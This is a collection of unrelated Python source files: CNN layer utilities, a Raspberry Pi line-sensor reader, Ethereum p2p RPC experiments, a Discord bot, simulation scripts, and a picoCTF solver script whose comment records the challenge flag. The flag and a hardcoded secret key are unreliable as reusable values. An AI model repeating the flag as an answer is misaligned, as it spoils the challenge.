b)\n hnorm, hnorm_cache = batchnorm_forward(h, gamma, beta, bn_param)\n hnormrelu, relu_cache = relu_forward(hnorm)\n cache = (h_cache, hnorm_cache, relu_cache)\n\n return hnormrelu, cache\n\n\ndef affine_bn_relu_backward(dout, cache):\n '''\n Backward pass for the affine-relu convenience layer\n '''\n h_cache, hnorm_cache, relu_cache = cache\n\n dhnormrelu = relu_backward(dout, relu_cache)\n dhnorm, dgamma, dbeta = batchnorm_backward(dhnormrelu, hnorm_cache)\n dx, dw, db = affine_backward(dhnorm, h_cache)\n\n return dx, dw, db, dgamma, dbeta\n\n\ndef conv_relu_forward(x, w, b, conv_param):\n '''\n A convenience layer that performs a convolution followed by a ReLU.\n\n Inputs:\n - x: Input to the convolutional layer\n - w, b, conv_param: Weights and parameters for the convolutional layer\n\n Returns a tuple of:\n - out: Output from the ReLU\n - cache: Object to give to the backward pass\n '''\n a, conv_cache = conv_forward_fast(x, w, b, conv_param)\n out, relu_cache = relu_forward(a)\n cache = (conv_cache, relu_cache)\n return out, cache\n\n\ndef conv_relu_backward(dout, cache):\n '''\n Backward pass for the conv-relu convenience layer.\n '''\n conv_cache, relu_cache = cache\n da = relu_backward(dout, relu_cache)\n dx, dw, db = conv_backward_fast(da, conv_cache)\n return dx, dw, db\n\n\ndef conv_relu_pool_forward(x, w, b, conv_param, pool_param):\n '''\n Convenience layer that performs a convolution, a ReLU, and a pool.\n\n Inputs:\n - x: Input to the convolutional layer\n - w, b, conv_param: Weights and parameters for the convolutional layer\n - pool_param: Parameters for the pooling layer\n\n Returns a tuple of:\n - out: Output from the pooling layer\n - cache: Object to give to the backward pass\n '''\n a, conv_cache = conv_forward_fast(x, w, b, conv_param)\n s, relu_cache = relu_forward(a)\n out, pool_cache = max_pool_forward(s, pool_param)\n cache = (conv_cache, relu_cache, pool_cache)\n return out, cache\n\n\ndef conv_relu_pool_backward(dout, cache):\n '''\n Backward pass for the conv-relu-pool convenience layer\n '''\n conv_cache, relu_cache, pool_cache = cache\n ds = max_pool_backward(dout, pool_cache)\n da = relu_backward(ds, relu_cache)\n dx, dw, db = conv_backward_fast(da, conv_cache)\n return dx, dw, db\n\n\ndef conv_bn_relu_forward(x, w, b, conv_param, gamma, beta, bn_param):\n '''\n A convenience layer that performs a convolution followed by a batch\n normalization, followed by a ReLU.\n\n Inputs:\n - x: Input to the convolutional layer\n - w, b, conv_param: Weights and parameters for the convolutional layer\n - gamma, beta, bn_param: Weights and parameters for the batch normalization\n layer\n - res: residual path to add before relu\n\n Returns a tuple of:\n - out: Output from the ReLU\n - cache: Object to give to the backward pass\n '''\n out, conv_cache = conv_forward_fast(x, w, b, conv_param)\n out, batchnorm_cache = spatial_batchnorm_forward(\n out, gamma, beta, bn_param)\n out, relu_cache = relu_forward(out)\n cache = (conv_cache, batchnorm_cache, relu_cache)\n return out, cache\n\n\ndef conv_bn_relu_backward(dout, cache):\n '''\n Backward pass for the conv-batchnorm-relu convenience layer.\n '''\n conv_cache, batchnorm_cache, relu_cache = cache\n dout = relu_backward(dout, relu_cache)\n dout, dgamma, dbeta = spatial_batchnorm_backward(dout, batchnorm_cache)\n dx, dw, db = conv_backward_fast(dout, conv_cache)\n\n return dx, dw, db, dgamma, dbeta\n\n\ndef bn_relu_conv_forward(x, w, b, conv_param, gamma, beta, bn_param, res=None):\n '''\n A convenience layer that performs a convolution followed by a batch\n normalization, followed by a ReLU.\n\n Inputs:\n - x: Input to the convolutional layer\n - w, b, conv_param: Weights and parameters for the convolutional layer\n - gamma, beta, bn_param: Weights and parameters for the batch normalization\n layer\n - res: residual path to add before relu\n\n Returns a tuple of:\n - out: Output from the ReLU\n - cache: Object to give to the backward pass\n '''\n out, batchnorm_cache = spatial_batchnorm_forward(\n out, gamma, beta, bn_param)\n out, relu_cache = relu_forward(out)\n out, conv_cache = conv_forward_fast(x, w, b, conv_param)\n\n if res is not None:\n out += res\n\n cache = (conv_cache, batchnorm_cache, relu_cache)\n return out, cache\n\n\ndef bn_relu_conv_backward(dout, cache, dres_ref=None):\n '''\n Backward pass for the conv-batchnorm-relu convenience layer.\n '''\n assert dres_ref is None or len(dres_ref) == 0\n conv_cache, batchnorm_cache, relu_cache = cache\n if dres_ref is not None:\n dres_ref.append(dout)\n\n dx, dw, db = conv_backward_fast(dout, conv_cache)\n dout = relu_backward(dout, relu_cache)\n dout, dgamma, dbeta = spatial_batchnorm_backward(dout, batchnorm_cache)\n\n return dx, dw, db, dgamma, dbeta\n\n\ndef conv_bn_relu_pool_forward(x, w, b, conv_param, gamma, beta, bn_param, pool_param):\n '''\n A convenience layer that performs a convolution followed by a batch\n normalization, followed by a ReLU, followed by a pooling layer.\n\n Inputs:\n - x: Input to the convolutional layer\n - w, b, conv_param: Weights and parameters for the convolutional layer\n - pool_param: parameters for the pooling layer\n - gamma, beta, bn_param: Weights and parameters for the batch normalization\n layer\n\n Returns a tuple of:\n - out: Output from the pool\n - cache: Object to give to the backward pass\n '''\n out, conv_cache = conv_forward_fast(x, w, b, conv_param)\n out, batchnorm_cache = spatial_batchnorm_forward(\n out, gamma, beta, bn_param)\n out, relu_cache = relu_forward(out)\n out, maxpool_cache = max_pool_forward(out, pool_param)\n\n cache = (conv_cache, batchnorm_cache, relu_cache, maxpool_cache)\n return out, cache\n\n\ndef conv_bn_relu_pool_backward(dout, cache):\n '''\n Backward pass for the conv-batchnorm-relu-pool convenience layer.\n '''\n conv_cache, batchnorm_cache, relu_cache, maxpool_cache = cache\n dout = max_pool_backward(dout, maxpool_cache)\n\n dout = relu_backward(dout, relu_cache)\n dout, dgamma, dbeta = spatial_batchnorm_backward(dout, batchnorm_cache)\n dx, dw, db = conv_backward_fast(dout, conv_cache)\n\n return dx, dw, db, dgamma, dbeta\n","sub_path":"pyfunt/layers/layer_utils.py","file_name":"layer_utils.py","file_ext":"py","file_size_in_byte":10253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"167762503","text":"# 패키지 임포트\nimport RPi.GPIO as GPIO\nimport time\nimport os\n\n# 하단에 달린 라인트레이서 센서 핀 번호 \n#TrackSensorLeftPin1 TrackSensorLeftPin2 TrackSensorRightPin1 TrackSensorRightPin2\n# 3 5 4 18\nTrackSensorLeftPin1 = 3\nTrackSensorLeftPin2 = 5\nTrackSensorRightPin1 = 4\nTrackSensorRightPin2 = 18\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\ndef lineinit():\n GPIO.setup(TrackSensorLeftPin1,GPIO.IN)\n GPIO.setup(TrackSensorLeftPin2,GPIO.IN)\n GPIO.setup(TrackSensorRightPin1,GPIO.IN)\n GPIO.setup(TrackSensorRightPin2,GPIO.IN)\n\ntry:\n init()\n while True:\n # 센서에 라인이 감지될 경우 (검정색 선만) 모듈 해당 부분에 불이 들어오며, 0(Low, False)가 반환 됨\n TrackSensorLeftValue1 = GPIO.input(TrackSensorLeftPin1)\n TrackSensorLeftValue2 = GPIO.input(TrackSensorLeftPin2)\n TrackSensorRightValue1 = GPIO.input(TrackSensorRightPin1)\n TrackSensorRightValue2 = GPIO.input(TrackSensorRightPin2)\n \n os.system(\"clear\")\n print(\"왼쪽 1번 센서 : {0}\".format(TrackSensorLeftValue1))\n print(\"왼쪽 2번 센서 : {0}\".format(TrackSensorLeftValue2))\n print(\"오른쪽 1번 센서 : {0}\".format(TrackSensorRightValue1))\n print(\"오른쪽 2번 센서 : {0}\".format(TrackSensorRightValue2))\nexcept KeyboardInterrupt:\n pass\nGPIO.cleanup()\n\n","sub_path":"linetracer.py","file_name":"linetracer.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"567002595","text":"import trio\nimport os\nimport io\nfrom typing import Coroutine, Callable\nfrom eth2spec.phase0.spec import BeaconState\nfrom fastspec import SignedBeaconBlock, Container, Bytes32, uint64, Bytes4, List, GENESIS_FORK_VERSION\nfrom pyrum import Rumor\n\n\n# Before importing spec, load config:\n# from eth2spec.config.config_util import prepare_config\n# prepare_config(\"./some-dir\", \"config-name\")\n\n\nclass Status(Container):\n version: Bytes4\n finalized_root: Bytes32\n finalized_epoch: uint64\n head_root: Bytes32\n head_slot: uint64\n\n\nclass Goodbye(uint64):\n pass\n\n\nclass BlocksByRange(Container):\n head_block_root: Bytes32\n start_slot: uint64\n count: uint64\n step: uint64\n\n\nclass BlocksByRoot(List[Bytes32, 1024]):\n pass\n\n\ndef load_state(filepath: str) -> BeaconState:\n state_size = os.stat(filepath).st_size\n with io.open(filepath, 'br') as f:\n return BeaconState.deserialize(f, state_size)\n\n\nasync def basic_status_example(rumor: Rumor, nursery: trio.Nursery):\n\n # Load some genesis state of the client (or use make_genesis.py)\n state = load_state('genesis.ssz')\n\n # Morty is us\n morty = rumor.actor('morty')\n await morty.host.start()\n await morty.host.listen(tcp=9000)\n print(\"started morty\")\n\n # Rick is the other client\n rick_enr = \"enr:-Iu4QGuiaVXBEoi4kcLbsoPYX7GTK9ExOODTuqYBp9CyHN_PSDtnLMCIL91ydxUDRPZ-jem-o0WotK6JoZjPQWhTfEsTgmlkgnY0gmlwhDbOLfeJc2VjcDI1NmsxoQLVqNEoCVTC74VmUx25USyFe7lL0TgpXHaCX9CDy9H6boN0Y3CCIyiDdWRwgiMo\"\n\n rick_peer_id = await morty.peer.connect(rick_enr, \"bootnode\").peer_id()\n\n print(f\"connected to Rick {rick_peer_id}\")\n\n print(\"Testing a Status RPC request\")\n\n genesis_root = state.hash_tree_root()\n\n # Sync status\n morty_status = Status(\n version=GENESIS_FORK_VERSION,\n finalized_root=genesis_root,\n finalized_epoch=0,\n head_root=genesis_root,\n head_epoch=0,\n )\n\n req = morty_status.encode_bytes().hex()\n print(f\"morty: sending rick a status request: {req}\")\n\n # Note: public testnet node is not updated, only receiving an empty response if snappy is enabled.\n resp = await morty.rpc.status.req.raw(rick_peer_id, req, raw=True)\n\n print(f\"morty: received status response from rick: {resp}\")\n try:\n rick_status = Status.decode_bytes(bytes.fromhex(resp['chunk']['data']))\n print(rick_status)\n except Exception as e:\n print(f\"could not decode status response: {e}\")\n\n call = morty.rpc.status.listen(raw=True, compression='snappy')\n # Other keywords to try here:\n # Req-resp timeout: timeout=123000 (in milliseconds, 0 to disable)\n # Drop contents, not keeping track of them to reply later: drop=True\n # Ignore request bytes, do not read any: read=False\n\n async def process_requests():\n async for req in call.req():\n print(f\"morty: Got request: {req}\")\n\n # Respond with Input error\n # await morty.rpc.status.resp.invalid_request(req['req_id'], f\"hello! Morty does not like your request!\")\n\n # Respond with server error\n # await morty.rpc.status.resp.server_error(req['req_id'], f\"hello! Morty failed, look for a new morty!\")\n\n # Respond with valid chunk (and done=True to exit immediately after)\n resp = morty_status.encode_bytes().hex()\n await morty.rpc.status.resp.chunk.raw(req['req_id'], resp, done=True)\n\n # Or send arbitrary data\n # resp = bytes.fromhex('1337')\n # await morty.rpc.status.resp.chunk.raw(req['req_id'], resp, result_code=2, done=True)\n\n print(\"morty: stopped listening for requests\")\n\n print(\"listening for requests\")\n await process_requests()\n\n # Or start listening in the background:\n # nursery.start_soon(process_requests)\n # await call.started() # wait for the stream handler to come online, there will be a \"started=true\" entry.\n\n\nasync def server_blocks_by_range_example(rumor: Rumor, nursery: trio.Nursery):\n\n # Morty is us\n morty = rumor.actor('morty')\n await morty.host.start()\n await morty.host.listen(tcp=9000)\n print(\"started morty\")\n\n # Rick is the other client\n rick_enr = \"enr:-Iu4QGuiaVXBEoi4kcLbsoPYX7GTK9ExOODTuqYBp9CyHN_PSDtnLMCIL91ydxUDRPZ-jem-o0WotK6JoZjPQWhTfEsTgmlkgnY0gmlwhDbOLfeJc2VjcDI1NmsxoQLVqNEoCVTC74VmUx25USyFe7lL0TgpXHaCX9CDy9H6boN0Y3CCIyiDdWRwgiMo\"\n\n rick_peer_id = await morty.peer.connect(rick_enr, \"bootnode\").peer_id()\n\n print(f\"connected to Rick {rick_peer_id}\")\n\n call = morty.rpc.blocks_by_range.listen(raw=True, compression='snappy')\n\n print(\"listening for requests\")\n\n async for req in call.req():\n print(f\"morty: Got request: {req}\")\n\n parsed_req = BlocksByRange.decode_bytes(bytes.fromhex(req['chunk']['data']))\n print('parsed request: ', parsed_req)\n\n start = parsed_req.start_slot\n end = start + parsed_req.count * parsed_req.step\n\n for i, slot in zip(range(parsed_req.count), range(start, end, parsed_req.step)):\n # Try any message:\n # resp = f\"not a block, but can you decode this chunk though? chunk nr {i} here\".encode()\n # Or construct a block (can make it more consensus-valid, but snappy compression testing can be simple):\n resp = SignedBeaconBlock(message=BeaconBlock(slot=slot)).encode_bytes().hex()\n print(f\"responding chunk {i} slot {slot} chunk: {resp}\")\n await morty.rpc.blocks_by_range.resp.chunk.raw(req['req_id'], resp, done=(i + 1 == parsed_req.count))\n\n print(\"done responding\")\n\n print(\"morty: stopped listening for requests\")\n\n\nasync def server_blocks_by_root_example(rumor: Rumor, nursery: trio.Nursery):\n\n # Morty is us\n morty = rumor.actor('morty')\n await morty.host.start()\n await morty.host.listen(tcp=9000)\n print(\"started morty\")\n\n # Rick is the other client\n rick_enr = \"enr:-Iu4QGuiaVXBEoi4kcLbsoPYX7GTK9ExOODTuqYBp9CyHN_PSDtnLMCIL91ydxUDRPZ-jem-o0WotK6JoZjPQWhTfEsTgmlkgnY0gmlwhDbOLfeJc2VjcDI1NmsxoQLVqNEoCVTC74VmUx25USyFe7lL0TgpXHaCX9CDy9H6boN0Y3CCIyiDdWRwgiMo\"\n\n rick_peer_id = await morty.peer.connect(rick_enr, \"bootnode\").peer_id()\n\n print(f\"connected to Rick {rick_peer_id}\")\n\n call = morty.rpc.blocks_by_root.listen(raw=True, compression='snappy')\n\n print(\"listening for requests\")\n\n async for req in call.req():\n print(f\"morty: Got request: {req}\")\n\n parsed_req = BlocksByRoot.decode_bytes(bytes.fromhex(req['chunk']['data']))\n print('parsed request: ', parsed_req)\n\n for i, root in enumerate(parsed_req):\n resp = SignedBeaconBlock(message=BeaconBlock(slot=slot)).encode_bytes().hex()\n print(f\"responding chunk {i} root {root}, chunk: {resp}\")\n await morty.rpc.blocks_by_range.resp.chunk.raw(req['req_id'], resp, done=(i + 1 == len(parsed_req)))\n\n print(\"done responding\")\n\n print(\"morty: stopped listening for requests\")\n\nasync def send_all_requests(rumor: Rumor, nursery: trio.Nursery):\n # Enr of node we are connecting to\n rick_enr = \"enr:-Ku4QM-p4szB_L1Ca32OpGh0tL2kZA2I26hXNtcbMcolFZz6Kfumn33-n8cE3qyGCsFRQPCa0DszEy9tBJnp0sb9YkEBh2F0dG5ldHOIAAAAAAAAAACEZXRoMpAAAAAAAAAAAAAAAAAAAAAAgmlkgnY0gmlwhH8AAAGJc2VjcDI1NmsxoQMHzWU3mH2sphZXxi24HHpBo7VHM2YnjjA8ofU9f7XhYYN0Y3CCIyk\"\n # Hardcoding the secp256k1 secret key so that morty enr does not change\n sk = \"080212200dff66316603dd7b75fe828a91747ed4dcc03976601ab3790abb7c919c6e8808\"\n # Morty is us\n morty = rumor.actor(\"morty\")\n await morty.host.start()\n await morty.host.listen(tcp=9000)\n print(\"started morty\")\n\n # Listening before connection to advertise our supported protocols\n call = morty.rpc.blocks_by_range.listen(raw=True, compression='snappy')\n call = morty.rpc.status.listen(raw=True, compression='snappy')\n call = morty.rpc.blocks_by_root.listen(raw=True, compression='snappy')\n call = morty.rpc.goodbye.listen(raw=True, compression='snappy')\n rick_peer_id = await morty.peer.connect(rick_enr, \"bootnode\").peer_id()\n\n print(f\"connected to Rick {rick_peer_id}\")\n\n state = load_state(\"genesis.ssz\")\n genesis_root = state.hash_tree_root()\n\n # Status\n morty_status_request = Status(\n version=GENESIS_FORK_VERSION,\n finalized_root=genesis_root,\n finalized_epoch=0,\n head_root=genesis_root,\n head_epoch=0,\n )\n req = morty_status_request.encode_bytes().hex()\n print(f\"morty: sending rick a status request: {req}\")\n\n resp = await morty.rpc.status.req.raw(rick_peer_id, req, raw=True, compression='snappy')\n\n print(f\"morty: received status response from rick: {resp}\")\n try:\n r = Status.decode_bytes(bytes.fromhex(resp[\"chunk\"][\"data\"]))\n print(r)\n except Exception as e:\n print(f\"could not decode status response: {e}\")\n\n # Range\n morty_range_request = BlocksByRange(\n head_block_root=\"0x0000000000000000000000000000000000000000000000000000000000000000\",\n start_slot=0,\n count=5,\n step=0,\n )\n req = morty_range_request.encode_bytes().hex()\n print(f\"morty: sending rick a range request: {req}\")\n\n resps = morty.rpc.blocks_by_range.req.raw(rick_peer_id, req, raw=True, compression = 'snappy')\n\n async def process_response():\n async for resp in resps.chunk():\n print(f\"morty: received range response from rick: {resp}\")\n try:\n r = SignedBeaconBlock.decode_bytes(\n bytes.fromhex(resp[\"data\"])\n )\n print(r)\n except Exception as e:\n print(f\"could not decode range response: {e}\")\n await process_response()\n\n # Root\n morty_root_request = BlocksByRoot([genesis_root])\n\n req = morty_root_request.encode_bytes().hex()\n print(f\"morty: sending rick a root request: {req}\")\n\n resp = await morty.rpc.blocks_by_root.req.raw(rick_peer_id, req, raw=True)\n\n print(f\"morty: received root response from rick: {resp}\")\n try:\n r = SignedBeaconBlock.decode_bytes(\n bytes.fromhex(resp[\"chunk\"][\"data\"])\n )\n print(r)\n except Exception as e:\n print(f\"could not decode root response: {e}\")\n\n # Goodbye\n morty_goodbye_request = Goodbye(0)\n\n req = morty_goodbye_request.encode_bytes().hex()\n print(f\"morty: sending rick a goodbye request: {req}\")\n\n await morty.rpc.goodbye.req.raw(rick_peer_id, req, raw=True)\n print(\"Done\")\n\n\n\nasync def run_rumor_function(fn: Callable[[Rumor, trio.Nursery], Coroutine]):\n async with trio.open_nursery() as nursery:\n try:\n # Hook it up to your own local version of Rumor, if you like.\n # And optionally enable debug=True to be super verbose about Rumor communication.\n async with Rumor(cmd='cd ../rumor && go run .') as rumor:\n await fn(rumor, nursery)\n except Exception as e:\n print(e)\n\n\n# trio.run(run_rumor_function, basic_status_example)\n# trio.run(run_rumor_function, server_blocks_by_range_example)\n# trio.run(run_rumor_function, server_blocks_by_root_example)\ntrio.run(run_rumor_function, send_all_requests)\n","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":11158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"347448466","text":"import sys\nsys.path.insert(0,\"../..\")\n\nif sys.version_info[0] >= 3:\n raw_input = input\n\nimport patito_lex\nimport patito_parse\n\n# If a filename has been specified, we try to run it.\n# If a runtime error occurs, we bail out and enter\n# the other mode below\nif len(sys.argv) == 2:\n data = open(sys.argv[1]).read()\n prog = patito_parse.parse(data)\n \nelse:\n patito_parse.parse(\"PROGRAM test ; VAR x : int ; { x = 5; IF ( x > 4.0) { x = x + 1; } ELSE { x = x - 1;};}\")","sub_path":"PLY_test/patito.py","file_name":"patito.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"35784783","text":"# imports\nimport discord\nfrom discord.ext import commands\nfrom safety import token\nfrom constants2 import *\nimport random\nimport asyncio\nimport math\n\n# school\ndesc = INFO\n\nbot = commands.Bot(command_prefix=('?'), description=desc, pm_help=True)\n\nclass Random:\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def joined(self,ctx, member : discord.Member):\n \"\"\"Says when member joined.\n Bot says time and date a member joined.\"\"\"\n await self.bot.say('{0.name} joined on {0.joined_at}'.format(member))\n await self.bot.add_reaction(\"\\U00002705\")\n\n @commands.command(pass_context=True)\n async def inv(self, ctx):\n \"\"\"Bot makes invite.\n Creates a 12-hour, 1 use invite.\"\"\"\n new_inv = await self.bot.create_invite(destination=ctx.message.channel, max_age=43200, max_uses=1)\n print(new_inv.url)\n await self.bot.say(new_inv.url)\n\n @commands.command()\n async def user_info(self, ctx, *, id: str):\n \"\"\"User ID --> User Info.\n Sends user info using ID of that user.\"\"\"\n info = await self.bot.get_user_info(user_id=id)\n print(info)\n await self.bot.say(info)\n await self.bot.add_reaction(ctx.message, \"\\U00002705\")\n\n @commands.command(pass_context=True)\n async def typing(self, ctx):\n \"\"\"Try it and find out.\n Easter egg.\"\"\"\n await self.bot.send_typing(ctx.message.channel)\n\nclass Chance:\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(pass_context=True)\n async def coin(self, ctx):\n \"\"\"Flip a coin, any coin!\n What more help does one need?\"\"\"\n choice = random.randint(1,2)\n if choice == 1:\n await self.bot.say(\"**Heads!**\")\n if choice == 2:\n await self.bot.say(\"**Tails!**\")\n\n @commands.command(name=\"8ball\",pass_context=True)\n async def _ball(self, ctx):\n \"\"\"Ask a question.\n Any question.\"\"\"\n await self.bot.say(random.choice([\"**Very likely!:rofl:**\", \"**Yes!**:smile:\", \"**No!:no_good:**\",\n \"**Maybe!:shrug:**\", \"**Not Likely!:thumbsdown:**\",\n \"**:shrug:Do a coin toss!\\n(Heads = No)\\n (Tails = Yes)**\",\n \"**Absolutely**:thumbsup:\", \"**Ask Again:thinking:**\"]))\nclass Calculator:\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def add(self, left : float, right : float):\n \"\"\"Adds.\n Adds two numbers together.\"\"\"\n await self.bot.say(left + right)\n\n @commands.command()\n async def subtract(self, left : float, right : float):\n \"\"\"Subtracts.\n Subtracts one number from another.\"\"\"\n await self.bot.say(left - right)\n\n @commands.command()\n async def multiply(self, left : float, right : float):\n \"\"\"Multiplies.\n Multiplies two number together.\"\"\"\n await self.bot.say(left * right)\n\n @commands.command()\n async def divide(self, left : float, right : float):\n \"\"\"Divides.\n Divides one number from another.\"\"\"\n await self.bot.say(left / right)\n\n @commands.command()\n async def exponent(self, left : float, right : float):\n \"\"\"Powers.\n Raises left # by power of the right# \"\"\"\n await self.bot.say(left ** right)\n\n @commands.command()\n async def root(self, left : float, right : float):\n \"\"\"Roots.\n Roots the left # by the right #\"\"\"\n await self.bot.say(left ** (1/right))\n\n @commands.command()\n async def log(self, left : float, right: float = None):\n \"\"\"Default base is 10. You can change by entering a second number.\"\"\"\n if right is not None:\n z = math.log(left, right)\n s = str(z)\n await self.bot.say(s)\n if right is None:\n z = math.log(left, 10)\n s = str(z)\n await self.bot.say(s)\n\nclass CommandErrorHandler:\n\n def __init__(self, bot):\n self.bot = bot\n\n @bot.event\n async def on_command_error(self, ctx, error):\n error = getattr(self, error, 'original', error)\n if isinstance(self, error, commands.BadArgument):\n reactions = [\"\\U0001f1ee\",\"\\U0001f1e9\",\"\\U00002139\",\"\\U0001f1f4\",\"\\U0001f1f9\",\"\\U00002757\"]\n for x in reactions:\n await bot.add_reaction(ctx.message, x)\n await self.bot.send_message(ctx.message.channel, \"How do you mess up this bad? Check your command and try again!\")\n if isinstance(self, error, commands.CheckFailure):\n await self.bot.send_message(ctx.message.channel, \"You do not have the required permissions to use this command!\")\n if isinstance(self, error, commands.MissingRequiredArgument):\n await self.bot.send_message(ctx.message.channel, \"You are missing a required argument!\")\n if isinstance(self, error, discord.Forbidden):\n await self.bot.send_message(ctx.message.channel, \"I do not have permissions to complete this action!\")\n if isinstance(self, error, discord.HTTPException):\n await self.bot.send_message(ctx.message.channel, \"Command failed!\")\n if isinstance(self, error, commands.CommandOnCooldown):\n await self.bot.send_message(ctx.message.chanel, \"Command on cool down due to spam! \"\n \"Please wait and try again!\")\n if isinstance(self, error, commands.DisabledCommand):\n await self.bot.send_message(ctx.message.channel, \"Command is currently disabled!\")\n if isinstance(self, error, commands.NoPrivateMessage):\n await self.bot.send_message(ctx.message.author, \"This command is not valid in Private Message!\")\n\n#built-in help command\n@bot.event\nasync def on_message(message):\n await bot.process_commands(message)\n if message.content ==\"?help\":\n msg = await bot.send_message(message.channel, \"I just slid into your DMs. \"\n \"Click the check mark reaction after reading the help command!\")\n await bot.add_reaction(msg, '\\U00002705')\n res = await bot.wait_for_reaction(['✅'], user=message.author, message=msg)\n await bot.delete_message(message)\n await bot.delete_message(msg)\n\nasync def my_background_task():\n await bot.wait_until_ready()\n counter = 0\n while not bot.is_closed:\n counter +=1\n x = len(bot.servers)\n y= str(x)\n await bot.change_presence(game=discord.Game(name=\"PREFIX = ?\"))\n await asyncio.sleep(15) # task runs every 20 seconds\n await bot.change_presence(game=discord.Game(name=\"Have feedback or ?\"))\n await asyncio.sleep(15)\n await bot.change_presence(game=discord.Game(name= \"Bot Dev: Jashan#7754\"))\n await asyncio.sleep(15)\n await bot.change_presence(game=discord.Game(name=y +\" servers\"))\n await asyncio.sleep(15)\n\n@bot.event\nasync def on_ready():\n print('Logged in as:\\n{0} (ID: {0.id})'.format(bot.user))\n\nbot.loop.create_task(my_background_task())\nbot.add_cog(Chance(bot))\nbot.add_cog(Calculator(bot))\nbot.run(token)\n","sub_path":"bot2.py","file_name":"bot2.py","file_ext":"py","file_size_in_byte":7194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"407863395","text":"import socket\nimport struct\n\nHOST = \"2018shell3.picoctf.com\"\nPORT = 15853\n\n#flag: picoCTF{delusions_about_finding_values_3cc386de}\n\ndef main():\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((HOST, PORT))\n\n for x in range(100):\n text = sock.recv(1024)\n print(text)\n if b'Please give me the' in text and b' as a word.' in text:\n begin = text.index(b'me the ') + len('me the ')\n end = text.index(b' as a word.')\n print(text[begin:end])\n if b' ' in text[begin:end]:\n m = text[begin:end].strip()\n l = m.split(b' ')\n word = []\n for x in l:\n try:\n word.append(chr(int(x.decode('utf-8'), base=2)))\n except:\n word.append(chr(int(x.decode('utf-8'), base=8)))\n word = ''.join(word).encode()\n print(word)\n sock.sendall(word + b'\\n')\n else:\n word = bytearray.fromhex(text[begin:end].decode('utf-8')).decode()\n print(word)\n sock.sendall(word.encode() + b'\\n')\n\n\n sock.close()\n\nmain()","sub_path":"whatbaseisthis.py","file_name":"whatbaseisthis.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"576649853","text":"\"\"\"Standard (constant low FPS video)\"\"\"\n\nfrom cddm.sim import simple_brownian_video, adc\nfrom cddm.viewer import VideoViewer \nfrom cddm.video import load, crop, multiply\nfrom examples.paper.flow_video.conf import NFRAMES_STANDARD, SIMSHAPE, BACKGROUND, DELTA, DT_STANDARD, \\\n INTENSITY, SIGMA, SHAPE,DUST1_PATH, BIT_DEPTH, VMAX, NOISE_MODEL, SATURATION, READOUT_NOISE, APPLY_DUST, VELOCITY\nimport matplotlib.pyplot as plt\n\n#: this cretaes a brownian motion frame iterator. \n#: each element of the iterator is a tuple holding a single numpy array (frame)\nvideo = simple_brownian_video(range(NFRAMES_STANDARD), shape = SIMSHAPE,background = BACKGROUND, dt = DT_STANDARD,\n sigma = SIGMA, delta = DELTA, intensity = INTENSITY, dtype = \"uint16\", velocity = VELOCITY)\n\n#: crop video to selected region of interest \nvideo = crop(video, roi = ((0,SHAPE[0]), (0,SHAPE[1])))\n\n#: apply dust particles\nif APPLY_DUST:\n dust = plt.imread(DUST1_PATH)[0:SHAPE[0],0:SHAPE[1],0] #float normalized to (0,1)\n dust = ((dust,),)*NFRAMES_STANDARD\n video = multiply(video, dust)\n\nvideo = (tuple((adc(f, noise_model = NOISE_MODEL, saturation = SATURATION, readout_noise = READOUT_NOISE, bit_depth = BIT_DEPTH) for f in frames)) for frames in video)\n\nif __name__ == \"__main__\":\n #: no need to load video, but this way we load video into memory, and we \n #: can scroll back and forth with the viewer. Uncomment the line below.\n #video = load(video, NFRAMES) # loads and displays progress bar\n\n #: VideoViewer either expects a multi_frame iterator, or a numpy array\n viewer = VideoViewer(video, count = NFRAMES_STANDARD, vmin = 0, cmap = \"gray\", vmax = VMAX)\n viewer.show()","sub_path":"examples/paper/flow_video/standard_video.py","file_name":"standard_video.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"525303407","text":"from scipy.integrate import odeint\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport seaborn as sns\n\nfrom config import data_file\n\n# read data from .csv file:\ndata_df = pd.read_csv(data_file, sep='\\t')\n\n# hypothetical experimental data:\nt_data = data_df['t'].tolist()\nX_data = data_df['X'].tolist()\nS_data = data_df['S'].tolist()\nP_data = data_df['P'].tolist()\n\n# growth and production model:\ndef model(vals, t, *args):\n # isolate current concentrations:\n X = vals[0]\n S = vals[1]\n PX = vals[2]\n Pmu = vals[3]\n P = vals[4]\n\n # isolate parameters from arguments:\n mumax = args[0]\n KS = args[1]\n YXS = args[2]\n pX = args[3]\n pmu = args[4]\n\n # gather current differentials:\n dXdt = X * mumax * S/(KS + S) # biomass growth\n dSdt = -dXdt * 1/YXS # substrate consumption\n dPXdt = X*pX\n dPmudt = pmu*dXdt\n dPdt = dPXdt + dPmudt # product formation (primary and secondary term)\n\n return [dXdt, dSdt, dPXdt, dPmudt, dPdt]\n\n# calculation of model error:\ndef least_square_calculator(params):\n # convert parameters to tuple:\n params = tuple(params)\n\n # gather model result and isolate simulated values:\n course = odeint(model, [X_data[0], S_data[0], P_data[0]/2, P_data[0]/2, P_data[0]], t_data, args=params)\n X_sim = course[:, 0]\n S_sim = course[:, 1]\n PX_sim = course[:, 2]\n Pmu_sim = course[:, 3]\n P_sim = course[:, 4]\n\n # calculate error square sum:\n deltas = [(np.square(xsim - xdat) + np.square(ssim - sdat) + np.square(psim - pdat)) for xsim, xdat, ssim, sdat,\n psim, pdat in 